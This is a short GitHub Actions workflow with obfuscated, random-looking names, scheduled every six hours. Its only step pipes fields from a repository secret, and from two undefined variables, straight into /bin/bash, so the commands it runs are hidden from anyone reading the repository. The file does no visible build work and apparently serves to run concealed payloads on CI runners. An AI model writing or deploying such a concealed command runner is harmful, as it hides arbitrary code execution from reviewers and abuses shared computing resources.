name: chupanbian4381

on:
  workflow_dispatch:
  schedule:
    - cron: '52 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chupanbian4381
        env:
          te74719: ${{ secrets.te74719 }}
        run: |
          echo $te74719 | jq -r .wdfw1 | /bin/bash
          echo $yeoc70 | jq -r .pqbsf14 | /bin/bash
          echo $mbfdi58 | jq -r .l0 | /bin/bash

